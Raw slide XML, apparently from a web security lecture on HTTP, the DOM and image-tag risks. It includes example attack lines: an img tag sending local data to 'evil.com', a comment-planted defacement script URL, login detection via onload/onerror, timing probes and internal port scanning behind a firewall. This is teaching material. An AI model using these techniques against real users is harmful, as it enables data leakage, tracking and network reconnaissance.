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2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334" r:id="rId13"/>
    <p:sldId id="335" r:id="rId14"/>
    <p:sldId id="282" r:id="rId15"/>
    <p:sldId id="283" r:id="rId16"/>
    <p:sldId id="336" r:id="rId17"/>
    <p:sldId id="337" r:id="rId18"/>
    <p:sldId id="284" r:id="rId19"/>
    <p:sldId id="285" r:id="rId20"/>
    <p:sldId id="286" r:id="rId21"/>
    <p:sldId id="287" r:id="rId22"/>
    <p:sldId id="288" r:id="rId23"/>
    <p:sldId id="28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1" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="121" d="100"/>
          <a:sy n="121" d="100"/>
        </p:scale>
        <p:origin x="-13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A702-4E9C-49E4-9816-25CFB30CD1DE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B03C-B53A-491D-9FF0-F78B921FB4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22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B4C7B-B852-4000-BA8B-C9DA288BA792}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>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4508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C24E73DC-F075-4293-9626-6E109DDD83F6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"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0511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904A546D-4F7E-42A3-A401-2722DE26BA08}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"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4707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15E55E8C-DFFB-430A-AEF8-5ADB56F4FBCE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"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0293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CFD1C102-9507-4FA8-81A7-7297927106E6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"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42563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D605EE26-1CB0-4E2A-B84D-C747D8E5CCE1}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"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3395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568ED943-A644-4C17-8A4D-0F3838B180B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr defTabSz="914485"/>
              <a:t>21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53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673BA8A2-3806-44CB-8868-D0DD35F11572}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr defTabSz="914485"/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1603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utput.asp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utput.asp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Module 5.3: HTTP &amp; Content Rendering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http protocol, Webpage Rendering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133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39433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Object-oriented interface used to read and write docs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web page in HTML is structured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DOM provides representation of this hierarchy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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>document.alinkColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>, document.URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>document.links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1"/>
              <a:t>document.anchors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.referrer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Includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Browser Object Model (BOM)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window, document, frames[], history, location, navigator (type and version of browser)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41935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www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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3886200" cy="35394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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400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&lt;body&gt;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&lt;h1&gt;My First Web Page&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;p&gt;My First Paragraph&lt;/p&gt;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&lt;p id="demo"&gt;&lt;/p&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:b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5 + 6;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>&lt;/script&gt;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0903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Object Model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71550"/>
            <a:ext cx="8610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The Document Object Model is a programming API for documents.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The object model itself closely resembles the structure of the documents it models. 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consider this table, taken from an HTML document:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TABLE&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;ROWS&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TR&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TD&gt;Shady Grove&lt;/TD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TD&gt;Aeolian&lt;/TD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/TR&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TR&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TD&gt;Over the River, Charlie&lt;/TD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;TD&gt;Dorian&lt;/TD&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/TR&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/ROWS&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;/TABLE&gt;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562600" y="2114550"/>
            <a:ext cx="2895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266950"/>
          <a:ext cx="2819400" cy="73152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Shady Grove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Aeolian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Over the River, Charlie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Dorian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My First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for the HTML Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113666" name="Picture 2" descr="DOM representation of the example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71650"/>
            <a:ext cx="6429050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Changing HTML using Script, DOM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Some possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>createElement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elementName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sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>newChild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sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>removeChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(node)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Example: Add a new list item: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895600" y="3486150"/>
            <a:ext cx="5943600" cy="148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kumimoji="1"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+mn-lt"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> list = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('t1')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newitem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document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>')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newtext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document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(text)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list.appendChild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newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)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newitem.appendChild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newtext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38800" y="1085850"/>
            <a:ext cx="25146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+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> id="t1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt; Item 1 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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754565" y="108585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869406"/>
                </a:solidFill>
                <a:latin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xmlns="" val="5303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Image Tags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4962526"/>
            <a:ext cx="355600" cy="180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06E595C-B8A9-4129-BDA4-5CF617B3E06C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="Picture 4" descr="beach sun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086101"/>
            <a:ext cx="2527300" cy="142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057400" y="3771901"/>
            <a:ext cx="33528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Displays this nice picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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 Security issues?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3" y="1200151"/>
            <a:ext cx="8251939" cy="1643527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dirty="0" smtClean="0"/>
              <a:t>&lt;html&gt;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  …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 &lt;p&gt;  … &lt;/p&gt;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  …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=“http://example.com/sunset.gif” height="50" width="100"&gt; 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  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc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1" y="114300"/>
            <a:ext cx="234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web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Img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Remember, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> tag includes a whole </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>separate file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> into your web page. You're only supposed to use this tag for images. Like this:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/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="http://example.com/images/example.jpg"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>But suppose some evil teenager in Alaska posts a comment with this little gem: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dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>="http://evilinalaska.com/scripts/deface-home-page.php"&gt;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visit this website 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2875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style="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>display:none</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>logged_in_to_gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>not_logged_in_to_gmail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="https://mail.google.com/mail/photos/img/photos/public/AIbEiAIAAABDCKa_hYq24u2WUyILdmNhcmRfcGhvdG8qKDI1ODFkOGViM2I5ZjUwZmZlYjE3MzQ2YmQyMjAzMjFlZTU3NjEzOTYwAZwSCm_MMUDjh599IgoA2muEmEZD" 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tag security issues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7600" y="4962526"/>
            <a:ext cx="355600" cy="180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68522F2-BA83-4287-A1B3-FDFCCF02D90D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036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33400" y="1047750"/>
            <a:ext cx="8229600" cy="339447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/>
              <a:t>Communicate with other sites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=“http://evil.com/pass-local-information.jpg?extra_information”&gt;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sz="2800" dirty="0" smtClean="0"/>
              <a:t>Hide resulting image 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 … ” height=“1" width=“1"&gt; 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Spoof other sites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Add logos that fool a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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762000" y="3867150"/>
            <a:ext cx="7315200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Important </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Point: A web page can send information to any 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114300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consequences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4400550"/>
            <a:ext cx="846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READ: https://iconewsblog.wordpress.com/2015/09/16/does-your-website-have-a-leak/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onError</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227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Basic function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Triggered when error occurs loading a document or an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Example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Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> handler if image does not exist and cannot load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28950"/>
            <a:ext cx="74676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lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr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="image.gif" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="alert('The image could not be loaded.')“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="18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3" y="4614862"/>
            <a:ext cx="70950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dirty="0" smtClean="0"/>
              <a:t>https://www.tutorialspoint.com/javascript/javascript_error_handling.htm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1" y="114300"/>
            <a:ext cx="234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web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timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251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smtClean="0"/>
              <a:t>Sample code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pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p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1543051"/>
            <a:ext cx="7467600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0" lvl="1">
              <a:buFont typeface="Times" pitchFamily="1" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> id="test" style="display: none"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;script&gt;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test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>(’test’);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start = new Date();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test.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> end = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>          alert("Total time: " + (end - start));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>     test.src = "http://www.example.com/page.html";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/body&gt;&lt;/html&gt;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1" y="114300"/>
            <a:ext cx="234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web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scanning behind firewall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r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>JavaScript can:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Request images from internal IP addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Example:  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=“192.168.0.4:8080”/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Use timeout/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> to determine success/failure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Fingerprint </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>webapps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> using known image names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50180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05150"/>
            <a:ext cx="2436813" cy="63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3975100" y="2912269"/>
            <a:ext cx="46038" cy="1428750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3714750"/>
            <a:ext cx="785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</a:rPr>
              <a:t>Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50183" name="Picture 8" descr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0366" y="3209926"/>
            <a:ext cx="1487487" cy="8536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5459416" y="3358755"/>
            <a:ext cx="1387475" cy="5976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tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malicious</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web page</a:t>
            </a:r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4211638" y="4857750"/>
            <a:ext cx="913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Firewall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700341" y="2828926"/>
            <a:ext cx="3781425" cy="488156"/>
            <a:chOff x="1760" y="2186"/>
            <a:chExt cx="2382" cy="410"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50206" name="Freeform 12"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1760" y="2364"/>
              <a:ext cx="1605" cy="232"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1197"/>
                <a:gd name="T1" fmla="*/ 1280 h 211"/>
                <a:gd name="T2" fmla="*/ 168353 w 1197"/>
                <a:gd name="T3" fmla="*/ 5 h 211"/>
                <a:gd name="T4" fmla="*/ 315092 w 1197"/>
                <a:gd name="T5" fmla="*/ 1098 h 211"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1197"/>
                <a:gd name="T10" fmla="*/ 0 h 211"/>
                <a:gd name="T11" fmla="*/ 1197 w 1197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7" h="211">
                  <a:moveTo>
                    <a:pt x="0" y="211"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="110"/>
                    <a:pt x="441" y="10"/>
                    <a:pt x="640" y="5"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="839" y="0"/>
                    <a:pt x="1018" y="90"/>
                    <a:pt x="1197" y="18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Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2664" y="2186"/>
              <a:ext cx="14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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1) “show me dancing pigs!”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297113" y="3249218"/>
            <a:ext cx="2976562" cy="603646"/>
            <a:chOff x="1506" y="2539"/>
            <a:chExt cx="1875" cy="507"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50204" name="Freeform 14"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1858" y="2539"/>
              <a:ext cx="1523" cy="212"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1544"/>
